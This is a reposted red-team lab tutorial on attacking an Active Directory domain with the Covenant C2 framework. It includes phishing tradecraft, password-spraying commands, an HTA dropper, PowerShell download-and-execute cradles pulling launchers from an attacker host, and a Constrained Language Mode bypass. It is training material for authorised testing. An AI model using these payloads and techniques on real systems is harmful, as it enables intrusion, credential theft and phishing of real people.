Cyber Bank

https://t.me/CyberBankSa
https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Penetration Testing: Red Teaming Active

Directory
Red-teaming Active Directory Lab #1 (ELS.LOCAL)

https://my.ine.com/CyberSecurity/courses/9328123b
/penetration-testing-red-teaming-active-directory
/lab/36c9cc04-7663-45bf-9c9b-78ec1c3f139e

Red-teaming Active Directory Lab

#1 (Covenant C2 vs ELS.LOCAL)
Contents
INTRODUCTION TO RED TEAMING

​Tools used

​Introduction to Red Teaming

​Initial reconnaissance

​Designing a phishing scenario

​Setting up Covenant

​Covenant Launchers and Grunts

INITIAL ACCESS

​Compromising Win10-WEB

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

​First Grunt

​CLM Bypass

​Windows Defender and AMSI

​Reconnaissance after compromise

​Privilege escalation with Covenant

​Elevation from administrator to System

​Compromising Jumpbox

​Extending foothold on Jumpbox

​Dumping credentials with Covenant

​Dumping credentials with safetykatz

​Impersonating users with Covenant

DOMAIN ATTACKS

​Starting point

​Domain Reconnaissance

​Domain reconnaissance II

​Rubeus inside Covenant

​Exploiting Unconstrained Delegation

​Domain ACL Exploitation

​Exploiting Misconfigured ACLs

​Setting up Bloodhound

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

​Using Bloodhound

​Bloodhound Ingestors

​Bloodhound Collection methods

​Bloodhound interface

​Bloodhound custom queries

​Mapping GPO misconfigurations using Sharphound

​Using Invoke-ACLScanner along with Bloodhound

​GPO Abuse

​In-memory .NET execution

​ASREPRoasting and Kerberoasting with Covenant

​Domain persistence with Golden Ticket

​Golden ticket and DCSync with Covenant

​Maintaining access without a golden ticket

​Silver tickets

​Remote registry backdoor

​Attacking trusts

​Forging trust ticket with Impacket

PIVOTING AND LATERAL MOVEMENT

​SMB Grunts

​FROM HTTP NTLM Relay to DC Access

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

​Lateral movement using PSRemoting

​WMI Launcher

​Passing session to Metasploit

​Attacking SQL Server

​Pivoting using Portproxy and SMBGrunts

​Direct pivoting with portproxy and covenant

LOCAL TASKS

​Local Persistence

​WMI Backdoor

​Connecting Covenant with C3 Framework

​Using Covenant launchers with Gadget to Jscript

​Hybrid binary-powershell launcher

​Bypassing UAC

​Windows Defenses

​Using Covenant in Applocker-enabled environments

​Bypassing applocker with DLL Launcher

INTRODUCTION TO RED TEAMING

Tools used:
covenant v0.4

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

kali 2019/4 (includes default version of socat,

Metasploit and other built-in tools)

powerview from PowerTools 2.0 repository

https://github.com/PowerShellEmpire/PowerTools/re
leases

mimikatz 2.2.0

Visual Studio 2017 with MSBuild 15

socat for Windows (1.7.3)

Introduction to Red Teaming

There is no strict definition of "Red Teaming"
however its general purpose is to simulate a
real-world threat to an organization. The primary
goal is to show the potential impact, not to
obtain maximum privileges - this is not a CTF
competition.

The impact can be shown by e.g. demonstrating

access to sensitive data and critical servers or
the ability to alter information and process
flows within the organization.

The result of the exercise should be

recommendations to the audited company on:

● How to handle incidents like the tested

scenarios

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

● How to better detect intrusion attempts

In red team engagements traditional reverse

shells are no longer used their role has been
taken by complex C2 (Command & Control)
frameworks that are able to receive and maintain
hundreds of concurrent "shells".

Moreover, physical access, however still

practiced, is often not needed. Traditional red
teaming often starts with a physical engagement
which ends up in planting a hardware backdoor (or
simply a laptop) inside the target organization.
In the context of this red team lab, we will
focus on a scenario where access to the target
organization is achieved remotely e.g. via
phishing or password spraying. This is often the
way attackers gain access to organizations.

A potential C2 infrastructure can look similar to

the below image:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://packt-type-cloud.s3.amazonaws.com/uploads
/sites/2432/2018/12/26b0fda1-5498-470e-9257-8fab7
586af4d.png

A C2 infrastructure may consist of:

● A SMTP Server - which will be used to

distribute phishing emails

● A Payload server - which will be used to

serve any files that will be downloaded to
victim devices

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

● Implants (Agents) - basically the reverse

shells which are created in a standardized,
C2-compatible format. Usually C2 frameworks
allow to create compatible implants in the
same way as you can create msfvenom payloads
using the Metasploit framework.

● Redirectors - servers that act as a proxy

between the victim and the back-end
infrastructure. Implants will connect to
redirectors and will have their traffic
passed further to the back-end, while any
non-implant originating traffic will be
dropped, effectively protecting the back-end
infrastructure from potential investigation
or counter-attack attempts.

● Network traffic has to be crafted in a way

that it will not be easily distinguished from
legitimate HTTP traffic. This means that
implants should communicate over HTTPS which
can be easily disguised as legitimate web
browsing. For additional security any
communication can be asynchronous or use
techniques like domain fronting.

● The backend C2 server is the heart of whole

operations. Here all implants can be managed
and the operator can manage all the
controlled devices within target

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

organization.

You can read more about designing red team

infrastructures below:

https://github.com/bluscreenofjeff/Red-Team-Infra
structure-Wiki

There are lot of C2 frameworks to choose from and

there is no clear winner between them. Some
popular choices are:

● Cobalt strike (commercial)

https://www.cobaltstrike.com/

● Metasploit (free and commercial)

https://www.metasploit.com/

● Covenant (Open source)

https://github.com/cobbr/Covenant

● SharpC2 (Open source)

https://github.com/SharpC2/SharpC2

● SilentTrinity (Open source)

https://github.com/byt3bl33d3r/SILENTTRINITY

● Faction (Open source)

https://www.factionc2.com/

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

● Koadic (Open source)

https://github.com/zerosum0x0/koadic

● Resurrected PowerShell Empire (Open source)

https://github.com/BC-SECURITY/Empire

In the context of this lab we will use Covenant

(written in .NET), however you are free to use
the C2 framework of your choosing.

In the following scenario we will try to operate

as if we were performing an internal red team
assessment against a real target (ELS.LOCAL).
During this lab we will perform thorough
reconnaissance/enumeration activities, obtain
initial foothold into the target organization,
and then try to extend our foothold by
identifying all possible attack paths and
misconfigurations.

During the tests, which you are encouraged to

follow along, we will use two Virtual Machines a
Windows 10 and a Kali Linux 2019.4. For more
information about the used setup please refer to
Tools Used part above.

Initial reconnaissance (Bonus, not related to

the lab)
This lab simulates an internal red teaming
engagement. That being said let's be reminded of

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

the initial reconnaissance steps that we should

take during external engagements. In the
beginning of an external red teaming engagement,
prior to any attack-related activities, we should
carefully analyze the attack surface of the
targeted organization. Numerous OSINT techniques
can help us figure out if there are any
exploitable weaknesses on the external perimeter
of the targeted organization.

We can use our Kali machine in order to perform

some basic checks against a target company. To be
on the safe side, use any company that is running
a bug bounty program, for example, Google.

If we wanted to target google.com, first thing we

need to check in a red team assessment is if we
have permission to attack that website. Although
real attackers will not care about this, we are
still on the "ethical" side of hacking. We should
thus always operate taking into consideration any
legal restrictions.

If a website is hosted by a third-party provider

or leverages shared hosting (which the case on
smaller companies), we must not target such an
asset. Start by issuing the following commands:

dig google.com +short

whois 216.58.215.78

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We can see that the above IP address is within a

range owned by Google, so this could be a valid
target.

You should perform such a verification against

any domain you are about to assess.

Attacking the exposed or a well-known subdomain

of a target organization is like charging at the
front door. It is very likely that any
application that is frequently used and/or is
well-known to external users is thoroughly
secured and monitored. As an attacker, you would
like to identify less obvious entry points, like
forgotten external-facing dev servers or rarely
used web applications.

One of the ways to do this could be performing

subdomain enumeration. If you are lucky, you
might also be able to find a misconfigured DNS
server which is vulnerable to Zone Transfer - and

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

obtain all the subdomains it is capable of

resolving.

For example, you might want to use dnscan

(https://github.com/rbsec/dnscan), which will
allow to identify subdomains through a
brute-force approach (using a wordlist) or
through an attempted zone transfer. See an
example below.

Another tool you might be interested in is amass.

Amass performs complex reconnaissance against
subdomains. It has multiple advanced options that
you can explore. On a Kali machine you should be
able to get and use Amass as follows.

sudo apt-get install amass

amass enum -active -d google.com -v -o google.com

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

You should start getting more and more new google

subdomains.

As Google is a very large organization, this

could produce a huge list of results. Even for
smaller organizations you will still be able to
get quite some information. Each subdomain can be
potential entry point to the target.

Note: Even stealthier (and passive) subdomain

enumeration can be achieved by analyzing SSL
certificates. https://censys.io/ collects such
data.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Designing a phishing scenario (Bonus, not

related to the lab)
The first rule of successful phishing is to
convince your target that the mail he/she is
opening is coming from a legitimate source. You
should take for granted that in mature
organizations, security awareness training has
taken place. This means that people may check the
sender domain (however, only few will do so).

In an ideal scenario you may encounter a

misconfigured corporate e-mail server. Spoofcheck
(https://github.com/BishopFox/spoofcheck) is a
very handy tool that can help you check if a
domain can be spoofed from.

If you have problems running spoofcheck, you

should use python2. On Kali, type:

pip2 install -r requirements.txt

python2 spoofcheck.py

In other cases, you may want to try using

homoglyphs or alter the letters' order in your
phishing domain name. Say you want to pretend you
are sending an email from targetcompany.com. You
can try to register domain (and set up a mail

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

server) like targetcopmany.com or

targetcompany.biz (or whatever tld is available
and looks convincing).

After setting up a convincing e-mail, you will

also need to seek your victims. Spear-phishing is
so successful only because it uses a strong
pretext behind the scenario - which can only be
achieved through proper OSINT.

For example, you want to send an e-mail only to a

certain department of the targeted company. In
order to achieve that, LinkedIn might be a very
helpful source of information. Through a source
like LinkedIn you can search for a certain
company and identify all employees linked to it.
Based on their public posts you may be able to
figure out what projects they are currently
working on or what currently matters for them the
most. This can be a priceless addition to your
social engineering scenario.

Another factor that will add reliability to your

attack is gathering and then leveraging valid
credentials after performing an initial breach.
Such credentials may allow you to authenticate to
a corporate e-mail server which may be vulnerable
to relaying or you can simply send an e-mail as
the person whose credentials you possess (be
careful though, since there is high likelihood
that someone will go back to your victim

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

personally and ask for an email they did not

sent).

As already covered in the course, another way of

identifying valid credentials is password
spraying. Password spraying requires an
authentication endpoint (like an Outlook Web
Application or Lync endpoint) and a large list of
valid logins (preferably logins used in corporate
SSO) in order to try a small number of popular or
guessable passwords against a large amount of
accounts. A helpful tool for that can be
https://github.com/byt3bl33d3r/SprayingToolkit.

Using SprayingToolkit, you may be able to conduct

a successful password spraying attack against an
OWA (Outlook Web Application) Endpoint using
atomizer.py.

./atomizer.py owa targetowaserver.example.com

February2020 /root/Desktop/users.txt

This way, account lockout might be avoided.

However, security-savvy companies may be
monitoring such attempts.

https://github.com/dafthack/MailSniper is another
effective password spraying tool, using which one
can easily conduct a password spraying attack
against OWA or Exchange servers.

The last method to obtain credentials is through

phishing portals. It is fairly easy to craft a

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

spoofed Google login page. The real art is to

create it in a way that will allow for actual
logging into the "Real" service behind without
the victim noticing.

Custom scripts can always be developed to do that

but tools like
https://github.com/drk1wi/Modlishka or
https://github.com/kgretzky/evilginx2 have
already been developed to facilitate such
attacks.

Setting up evilginx will require you to set up

your own domain. Among the advantages of using
this tool is a pre-configured set of phishing
templates named phishlets, which are compatible
with evilnginx. This allows for quickly setting
up an effective phishing campaign.

It is about time we set up a C2 that will handle

incoming connections. For the time being, let's
build a simple infrastructure on top of our two
aforementioned Virtual Machines. In a real-life
scenario you would possibly like to have a more
complex infrastructure, like the one we already
mentioned in the beginning of this document.

Setting up Covenant (Perform this on your

attacking machine)
We will use Covenant C2 which can be downloaded
from its GitHub page,

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://github.com/cobbr/Covenant. The
installation instructions for the tool can be
found at
https://github.com/cobbr/Covenant/wiki/Installati
on-And-Startup

Covenant can also be run from a docker

repository. This is the installation way we
chose. That being said, you can proceed with a
permanent installation on your attacking machine.

git clone --recurse-submodules

https://github.com/cobbr/Covenant

cd Covenant/Covenant

docker build -t covenant .

docker run -it -p 7443:7443 -p 80:80 -p 443:443

--name covenant -v
</absolute/path/to/Covenant/Covenant/Data>:/app/D
ata covenant

Notice that you may want to issue a command like

the below, as the last step.

docker run -it -p 7443:7443 -p 80:80 -p 443:443

--name covenant -v `pwd`/Data:/app/Data covenant

If everything goes according to plan, you should

see output similar to the below.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

You can now visit https://127.0.0.1:7443 to start

working with Covenant. Note, that it is listening
on 0.0.0.0. In a real-life scenario you should
never allow the C2 administrative interface to be
exposed externally.

We will set up the administrative user "redteam"

with a password of "redteam".

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Let's go to Listeners and press Create

If you are running Covenant from docker, you may

need to change the IP from the docker IP to your
VM's external IP. Additionally, you can change
the listener name, as follows.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

You should see the Listener being created.

Covenant Launchers and Grunts (Practice this

on your attacking machine)
Now, for each listener you need to create a
Launcher. Launcher is the implant "loader"
associated with its parent listener, and upon
being run on a Windows system it will connect
back to the listener it is associated with. Let's
go to Launchers:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Note that Covenant offers plenty of launchers.

Moreover, each launcher can be wrapped in your
own custom dropper that fits the constraints of
the targeted environment best. Proper recon,
enumeration and OSINT can help you choose the
best launcher for each scenario and any technical
constraints of the targeted environment.

This time, we will choose the PowerShell

Launcher.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We will leave the default options. When you click

on Generate, the Launcher and the Encoded
launcher will appear, as follows.

Let's now go to the Host tab at the top of the

page and insert a URL under which the payload
will be hosted. Then, press "Host".

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

If you now look at the Launcher fields, you will

notice that they contain updated launcher code.

Stager/Launcher contains the payload used to

control the remote machine. Once a machine is
compromised, it will become visible under
"Grunts". A Grunt in Covenant represents a
compromised machine.

Payload Delivery

As we now have a command to execute, we should

also prepare a payload delivery mechanism. Note
that the below technique was performed on an
offline, local machine. You will have the
opportunity to use launchers against the lab
environment shortly!

The "traditional" way of delivering a payload

involves an Office document containing a macro.
When choosing that technique, remember that
saving a word document as Word 97-2003 document
can help you to avoid the .docm extension which

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

is considered malicious. However, you should be

aware that many AV products already flag macros
that run PowerShell as malicious.

You can try to deliver the payload in a less

obvious way, using a .hta file.

HTA is HTML Application and is considered a

less-known attack vector than a Macro document.

Save Following file as "Document.hta" on your

Kali (attacker) machine:

<script language="VBScript">

Function DoStuff()

Dim wsh

Set wsh = CreateObject("Wscript.Shell")

wsh.run "powershell -Sta [YOUR LAUNCHER]"

Set wsh = Nothing

End Function

DoStuff

self.close

</script>

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

The .hta file can be hosted by Covenant as well,

so you don't need to create separate HTTP server.
Simply go to the Listener you created in the
beginning and then navigate to the Hosted Files
tab at the top of the page. Click on "Create" and
choose the .hta file. Finally, press "Create"
again.

We can now go to our Windows victim machine.

Simply open Internet Explorer and go to .

http://[ATTACKER_IP]/Document.hta

Note that the default option is Open, so let's

choose it, as follows.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Windows will then display a warning, which many

users might click through anyway. Name and
publisher seems to be trusted, it's Microsoft!

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

After Allow is clicked, we can go to our Attacker

machine to the "Grunts" tab. A new victim has
just been registered.

Clicking on the Grunt's name allows for further

interaction, by using the Interact and Task tabs.

Interact allows for command line interaction.

Note that the results of commands issued using

Task will be visible in Taskings.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

You can control a Grunt's frequency of

"connect-backs" by configuring the Delay value
(in seconds) with a percentage of that value as
jitter.

For example, a default Grunt will communicate

back to Covenant every 4.5 to 5.5 seconds (5s +/-
10%)

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

It is about time we get our hands dirty in the

lab environment. This lab environment has been
created as a playground and its nature is
educational. This means that you should just
follow along and replicate what you read in the
lab environment, without trying to figure out
attack paths yourself. Don't worry! Two other
Active Directory labs exist, where you will
figure out the attack paths yourself. First,
let's create a new listener as follows.
ConnectAddress should be your tap0 IP.

After the listener is created, we can go to

"Launchers"

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Let's create a PowerShell Launcher specifying the

GruntHTTP template.

Click "Generate", go to the "Host" tab and name

it as you wish (we will use http.ps1), then click
"host".

A new launcher one-liner will appear. This will

be run on first machine that we compromise,
helping us establish our first HTTP grunt.

INITIAL ACCESS
As already mentioned, you may receive a
different address when connecting to VPN (tap0

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

IP). Pay attention to use this IP as the

"connect-back" address.

Compromising Win10-WEB
In order to compromise win10-web, we will try
password spraying against the exposed RDP
service. We can identify that RDP is enabled
through a Nmap scan on all TCP ports. We know
that a user named victim uses this workstation
and that the domain name is ELS-CHILD.

Let's try to attack the ELS-CHILD\VICTIM user

with some extremely guessable passwords for
example, July2020, July2020!, Summer2020 and
Summer2020!

We will use
https://github.com/xFreed0m/RDPassSpray

python3 RDPassSpray.py -u victim -p Summer2020!

-d ELS-CHILD -t 10.100.10.240:65520

First Grunt
As you now have RDP access to the WIN10-WEB
machine, go ahead and use that access to download

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

and execute the first Covenant grunt. Connect

with rdesktop or any other rdp client of choice
and use the discovered credentials to sign in.

rdesktop 10.100.10.240:65520

Note that we created another PowerShell launcher

and hosted it as 1.ps1 in the same way as
described above.

powershell iex (new-object

net.webclient).downloadstring('http://10.100.10.2
/1.ps1')

Unfortunately, we cannot proceed yet due to

Constrained Language Mode.

CLM Bypass
CLM stands for PowerShell Constrained Language
Mode, which is able to limit PowerShell to core
types only. If a proper level of restriction is
implemented, the user will not be able to access
.NET or execute complex scripts like Covenant
launchers.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

CLM can be set by editing a global environment

variable named __PSLockdownPolicy. When its value
is equal to 8 PowerShell operates in Full
Language Mode (which means no restrictions). On
WIN10-WEB it was set to 4, which is Constrained
Language Mode.

In such a case, even if we are an Administrator,

we cannot make use of all Powershell features
while Constrained Language Mode is on. If you
have the possibility to interact with the target
system only via the command line, you can disable
CLM by issuing the following command while in the
context of NT Authority/SYSTEM:

setx __PSLockdownPolicy "8" /M

The result can be checked by issuing the below

command in PowerShell.

$ExecutionContext.SessionState.LanguageMode

Back in the lab, let's now try to read a file

while PowerShell operates in Constrained Language
Mode.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

[System.IO.File]::ReadAllBytes(“C:\Windows\System
32\license.rtf”)

Unfortunately, the attempt was unsuccessful due

to CLM.

Let's use a CLM bypass technique that can be

found on the below repository.

https://github.com/p3nt4/PowerShdll

The .dll is precompiled in the x64 folder. For

convenience, we renamed it to ps.dll and
transferred it to our victim machine:

Now, the bytes can be successfully read.

With GUI access (and enough rights), these

settings can be adjusted manually. If we set the

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

system environment variable to 8 and spawn a new

PowerShell window, we should be able to use "Full
Language Mode".

Note, that this method is applicable only when

CLM is set up locally. When pairing PowerShell
v5 with AppLocker, Constrained Language Mode can
no longer be easily bypassed.

After setting the environment variable to 8,

launch a new PS window as administrator and
re-enter the launcher command

iex (new-object
net.webclient).downloadstring('http://10.100.10.2
/1.ps1')

After a short while we can observe a new

GruntHTTP being spawned.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Windows Defender and AMSI

AMSI stands for "Anti-Malware Scan Interface" and
it is another feature of Windows Defender for
detecting malicious actors. AMSI is targeted
especially at malicious scripts and other less
obvious/dangerous programmatic components.

AMSI can perform detection also in a heuristic

way, which means that a program's behavior is one
of criteria to flag it as malicious or not.
Moreover, it can perform in-memory detection by
loading the AMSI module into each process'
memory.

Note, that in the below exercise we use the

"AdminELS" user who is also a user of Win10-WEB.
Since you have administrative privileges on that
workstation, you can change AdminELS' password
and impersonate him.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://docs.microsoft.com/en-us/windows/win32/am
si/images/amsi7archi.jpg

In order to enable / disable AMSI:

Go to Windows Security -> Virus & Threat

Protection and make sure that it is turned on.

